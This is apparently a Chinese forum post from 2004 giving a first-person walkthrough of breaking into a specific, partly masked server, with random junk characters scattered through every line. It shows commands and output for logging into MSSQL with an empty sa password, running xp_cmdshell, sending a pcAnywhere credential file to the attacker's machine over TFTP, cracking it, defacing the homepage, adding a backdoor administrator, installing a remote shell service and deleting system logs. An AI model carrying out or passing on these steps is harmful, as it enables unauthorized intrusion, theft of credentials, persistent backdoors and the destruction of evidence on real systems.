|
先ping出目标主机的IP地址: ' j5 q Q+ P. ~; G: w7 h/ {: N
连接IP主机: 211.154.xxx.xx... + _5 K: {5 T" @: p9 w
发送 56 个字节... # l9 d6 [2 j" j# D) v
接收到 56 个字节! 历时: 0毫秒
9 Y$ X' ?- e2 X结论: IP主机正在与Internet连接中... 6 C& V$ h2 W/ e; [# A
接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理): & }; X4 N" R" _* B
主机信息
0 z: H2 ?+ `# m: @: P& `* D主机名:BEWDB01NOK 7 b' M8 ?4 ?; b! [9 p. y
80(HTTP)
' A1 R: M4 q" ], z21(FTP Control) 4 T6 t' H) h/ x7 k3 g
25(SMTP) 5 W( e/ I- ]- y; X
443(HTTPS) % j3 h4 a5 U- c7 S5 D
1433(MSSQL)
0 z& A+ b0 r b2 R- ^% @5631(PCAnyWhere)
1 B: {$ o: @$ ~/ ?5 N+ V用户列表 $ u7 Y( z9 Q& s9 `- ?. D! u
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin)
; W1 L) Z+ ^: W6 e3 D+ e m漏洞: 2 o% m$ f# U4 O1 u) v r
/\../readme.txt (HTTP: 200 )
: i- l7 |, }9 y1 C/msadc/msadcs.dll (HTTP: 200 )
. V- W( _! v) D1 _3 P% v* z; d! N0 J9 J/iisadmpwd/achg.htr (HTTP: 200 ) 3 T$ w# t5 o5 e7 {% U8 h2 A2 D
/_AuthChangeUrl (HTTP: 200 ) # c$ p8 Y5 G$ F/ i$ [+ n
/?PageServices (HTTP: 200 )
" Z. Y1 [0 w6 e" Y 上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看, 9 f. l5 I' K/ P: D
21(FTP Control) 8 W. K6 i0 R, Q% \
1433(MSSQL) 2 e, G; I% i6 W$ G' r, k
5631(PCAnyWhere) . X+ e/ M1 j# p! N1 f/ |( r
只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从
( _% C& A9 k7 k8 n6 v" C9 S1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx
: _ m5 \+ h% C# u8 R' F3 [Username为sa . ? n |' f0 ?' k
password框空,连接:
0 }- I* I5 c5 G( O* uSQL>Connecting 211.154.xxx.xx
+ |5 s. f3 Y- VSQL>Connected to 211.154.xxx.xx
+ S* t- n8 y% |' l 呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell " "的形式运行任意dos指令了!dir一下试试看:
/ W$ `- ^* C' m3 S- NSQL>Command: xp_cmdshell "dir c:\" : W3 B* x2 e4 I2 c' J
驱动器 C 中的卷没有卷标。 : p6 _6 v/ Q: r8 F( \- X
卷的序列号是 5CBD-664C 1 a' H; R, J6 u" q% f; }
卷的序列号是 5CBD-664C
; i6 D! [4 Q6 S V+ Z$ Lc:\ 的目录
! r% v( u" @7 n( h$ m9 i8 n/ rc:\ 的目录
$ o0 A) Y# E3 o8 F- n$ E01-12-20 08:13p <DIR> 2u2u
& a1 N: O2 `6 e- h- k0 \$ ~" I01-07-23 08:10p 0 AUTOEXEC.BAT
' y. b# U" V. C% L: D x$ z01-11-28 04:02p 84 biaoti.txt + z& B( w& ?3 z! s0 }
01-07-23 08:10p 0 CONFIG.SYS 2 ?# r7 c0 k6 L
01-11-22 11:49a <DIR> InetPub 8 k3 @- A6 W5 C9 d) w
01-10-25 11:12a 15,360 kkkk.XLS 6 j, a; K7 n) ~$ \- r/ S
01-07-24 12:09p <DIR> MSSQL7 # E6 M; A$ k1 `. R1 J
01-12-12 11:00a 134,217,728 pagefile.sys % V1 q) V+ I ^+ W! A' ?9 b% H4 N
01-11-30 10:59a <DIR> Program Files / p7 D; |5 x+ F2 I! k; X/ m c
01-09-04 02:43p 136 sp_attach.sql
, R" B7 e! H8 w/ j. D% j01-12-20 04:12p <DIR> temp 7 _& U1 ] f( l$ I1 R, u. j7 @
01-09-27 11:14a <DIR> unzipped , H$ C) e! y+ N
01-12-15 12:09a <DIR> WINNT 9 K' A6 I. d9 j
13 个文件 134,233,308 字节
; r$ b; c5 C$ \; a, J& g54,232,576 字节可用
( p% o: A1 l8 f3 B54,232,576 字节可用 1 d* t2 s9 ^4 n
这时我们便可以改对方的主页了!前提是先找到对方的web目录!来找找看
0 U' j% G2 Y1 N# i…………
$ _+ Z7 b+ T- P) t4 j4 v. EXX分钟后,满头大汉,乖乖!竟然有X个盘,每个盘下又有XX个目录,这样找下去得何年何月?不成!要是有windows界面的形式就好找的多了!想想看,目标主机还开着5631端口,这正是pcanywhere远程管理端口呀!取了它的管理帐号和密码不就得了吗?不错的想法,呵呵……
4 r2 B4 v; Z; w1 h默认情况下,pcanywhere安装于c:\Program Files目录下,其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件,就可以用一个叫pcanywherepwd的软件快速解出密码!
2 K' `! V& V6 O% I且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务:
3 q+ y% Z- j) d6 L6 f( q. o/ f选择“工具”菜单中的tftp服务器。设置一个默认根目录,点启动即可! 0 ^$ c0 V0 o7 F
然后再用ms-sql客户端在目标服务器执行如下指令:
$ r3 y/ Y. N; q7 } B; q* _1 icopy c:\progra~1\pcanywhere\data\New Caller.CIF c:\winnt\system32
. w7 G2 N( v2 Otftp -i 本地ip put New Caller.CIF
; m. }! b8 @! C+ A命令执行成功,这个cif文件已被传到本地tftp目录下了! * a- E- _/ T, b: R; p2 Z* D
此时,用pcanywherepwd.exe破解此文件,得到用户名为:administrator
& J; v3 ~/ L1 d; l5 s [密码为:amsrepair % ?$ i5 K! O5 h* F. _, P
打开pcanywhere manager建立一个指向211.154.xxx.xx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip:211.154.xxx.xx ( J& F3 Q( c; E
选中login information项中的automatically login to host up connection & ]# R/ r; g1 Q( i+ F
并在下面的login name和password栏中添入刚才得到的用户名和密码!确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。这下好搞了,呵呵~~在
, K' A; }, V# }: Ug:\home\wwweb\目录下,终于找到了他们的index.htm。删!再手动定一个简单的文件: . Q; V) y8 a! x- p
<html>
8 n7 `/ A! _2 X0 Z0 D<head>
M3 z) w& b; {. z9 v<title>hacked<title> ! L8 U2 `0 m# J; r: t; x! H
</head>
: O, _3 K" Q2 M. _1 x- Q<body>
, ?" x- Q2 b8 e1 t<center>
( t; b4 ?) ?! {+ u9 _2 Phacked
& L, Z8 b0 S1 g+ W/ m' _9 |</center> 4 ~6 j% D) }& E- v& [. d6 _8 A' v
</body> * c$ e* b/ G# M8 W6 b3 T7 ?$ ]
保存为:index.htm 7 ~. P/ s* E6 }! p2 f
修改主页完成。 9 O K1 v; F; |
2 h$ L: K8 s1 z4 {
该留个后门了,这是个NT主机,用小榕的RemoteNC做后门最好不过了!
$ U7 A) r$ Q; T/ N- |/ C先给系统加个超级用户,用ms-sql来做: 7 ]/ Q, i, {8 D& t. S
net user wing wing /add ( U/ @6 C2 W% E, P
net localgroup administrators wing /add 3 l" d: M/ H+ T5 f8 {7 n4 {. J! T
从对方桌面上打开ie连到小榕的站上下载RemoteNC,然后进入命令提示行状态,键入:
9 M. C4 {! Q S7 s* _ g9 qRemoteNC 211.154.xxx.xx wing wing LocalSystem "RemoteNC" "Provide Local CMD Redirect" 7 123456 7 C. t; M) d- j" b/ ~% Q+ q
系统显示: . z$ g, i! g/ [9 d0 w/ u/ Y' f1 ^
[Install Service as RunasUser Mode]
, \; i' D8 r# A& [5 |6 Y, ?* oConnecting 211.154.xxx.xx ..... Done. + q& a; y# n- c4 r; J" t8 d: E
Transffer File ..... Done.
5 r/ a2 l/ x% ? \8 V* Q o9 ?Start Service ..... Done.
6 Y* B6 m1 {' @+ Z* b1 ? ?% g
8 `1 X( w- x( \( G5 n! ONow You can 211.154.xxx.xx to Connect, Have a Joy 安装成功 - d% p/ N( n; i0 K" O& p
这样在任何时候都可以telnet 211.154.xxx.xx 7输入密码:123456即可使用系统任何资源了!
/ C7 ~" G5 S! @2 ?3 O1 i接下来该清理战场了,在ms-sql下停掉对方的ftp和www服务: : D& r& l7 i9 f/ w# P
net stop msftpsvc
2 ^ o5 o3 i- O ~; |! y! Cnet stop w3svc
& l+ G) ]" l; X, Z3 I删除c:\winnt\sys tem32\logfile下的所有文件。 $ ~0 T$ I: f7 v* N- t5 r
再将服务恢复: , o \; P8 I6 U
net start msftpsvc
" B9 b# B: a! j" y- E E* fnet start w3svc | 
IP卡
狗仔卡
发表于 2004-10-6 02:15
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
